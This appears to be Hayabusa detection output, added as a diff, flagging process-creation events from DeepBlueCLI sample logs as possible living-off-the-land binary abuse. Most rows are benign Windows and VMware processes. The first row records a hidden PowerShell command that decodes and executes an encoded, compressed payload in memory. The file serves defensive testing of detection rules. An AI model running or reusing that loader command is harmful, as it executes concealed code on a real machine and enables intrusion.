+2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x94c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 06:05:56.876 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x144 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 06:06:09.220 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 06:06:09.236 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xff8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 07:54:48.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc0c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 07:54:49.720 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 07:54:49.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 07:55:08.329 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb0c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x85c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 08:06:57.658 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcf4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:07:47.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb78 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:07:48.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x37c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:08:02.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:08:08.052 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x238 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:12:51.579 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:19:46.662 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:19:47.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:20:06.599 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3c0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:20:16.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 11:20:16.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 22:57:54.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 22:57:55.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xef8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 22:57:59.004 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x82c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 22:58:15.410 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xbbc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 22:59:20.128 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb24 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 23:01:29.243 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 01:01:36.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 01:01:36.883 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 01:01:36.898 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc68 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 01:03:36.695 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x68c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 01:57:08.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 02:02:48.677 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xcbc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 02:02:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x598 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:09:55.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:09:57.781 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:10:11.609 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:10:17.702 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:12:20.805 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x46c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:47:30.057 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:47:31.026 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x6a0 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:47:31.073 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 05:47:46.745 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe6c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 06:12:04.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xda0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 06:12:28.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 06:12:41.946 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4b0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-20 06:13:05.290 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
